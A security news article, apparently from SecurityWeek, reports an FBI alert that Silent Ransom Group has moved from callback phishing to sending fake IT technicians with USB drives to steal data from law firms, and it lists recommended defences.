The infamous extortion gang Silent Ransom Group (SRG) has escalated its tactics, now sending operatives physically to victims' offices to insert USB drives and steal sensitive data, according to a new alert from the Federal Bureau of Investigation (FBI). Active since at least 2022, SRG initially focused on law firms in the United States, using callback phishing emails and social engineering calls to trick employees into granting remote access. The group typically poses as IT support, claiming to help cancel unwanted subscription fees. Once given access, they rapidly exfiltrate data, often without deploying file-encrypting ransomware.

Evolution of SRG Tactics

In a May 2025 alert, the FBI detailed SRG's use of phishing emails containing links to remote access software, enabling attackers to quickly steal data. However, in more recent attacks observed this year, SRG has updated its approach. The gang now directly calls or sends phishing emails urging employees to call a phone number answered by an attacker impersonating IT support. During these calls, the victims are instructed to grant remote desktop access to their machines. If the employee hesitates or the remote attempt fails, SRG sends a physical operative to the victim's location, posing as an IT technician who can fix the issue in person.

“In this scheme, the threat actor tells the victim they need to image the device or create a backup file to address potential impacts from the phishing email,” the FBI explains. The operative carries a USB drive or external hard drive, which they insert into the targeted computer. Once connected, they gain access and immediately begin extracting data. The FBI notes that after gaining access, SRG escalates privileges and exfiltrates data using legitimate tools such as WinSCP (Windows Secure Copy) or a modified version of Rclone. In some instances, they upload stolen data to internal file-sharing platforms like Google Drive and Microsoft OneDrive.

Extortion and Pressure Tactics

After successfully exfiltrating data, SRG contacts the victim organization and demands payment, threatening to sell or publicly release the stolen data online. To increase pressure, the group also contacts employees and clients of the victim, making the extortion more personal and urgent. The FBI warns that recent SRG campaigns leave few forensic artifacts on compromised machines, and traditional antivirus products are unlikely to flag the intrusion because the group uses legitimate system management or remote access tools. This stealthy approach makes detection and attribution challenging for security teams.

Background on Silent Ransom Group

Silent Ransom Group first emerged in 2022, primarily targeting law firms, which often handle highly sensitive client information. The group's initial modus operandi involved callback phishing—sending emails that urge recipients to call a provided number, where social engineers guide them through installing remote access software. Over time, SRG has refined its tactics to include in-person interventions, a significant escalation that poses physical security risks to organizations. The FBI's alert underscores that while SRG is not known for deploying ransomware in these latest attacks, the data exfiltration alone can cause devastating financial and reputational damage, especially for law firms bound by strict confidentiality obligations.

Mitigation Recommendations

To prevent SRG attacks, organizations—particularly law firms—are advised to implement a layered security approach. The FBI recommends verifying the credentials of all individuals requesting access to company assets, especially those claiming to be IT support. Employees should be trained to identify phishing attempts and report unusual phone calls or unsolicited visits. Organizations should establish clear policies for IT support communication and authentication, such as requiring a ticket number or manager approval before granting remote access.

Technical measures include backing up all company data regularly, implementing phishing-resistant multi-factor authentication (MFA), and blocking access to commonly exploited ports. Disabling remote access for users who do not need it and restricting permissions for external drive installation can also prevent unauthorized data theft. The FBI emphasizes that because SRG uses legitimate tools, proactive monitoring of network activity and behavioral analytics may help detect anomalous data transfers.

The escalation to in-person attacks highlights the need for physical security protocols. Organizations should restrict physical access to offices and require visitor registration for anyone claiming to be a technician. Any unexpected IT visit should be verified through a separate communication channel (e.g., calling the IT department directly using a known number). As cybercriminals become bolder, blending digital and physical tactics, businesses must adapt their defenses accordingly.

Source: SecurityWeek News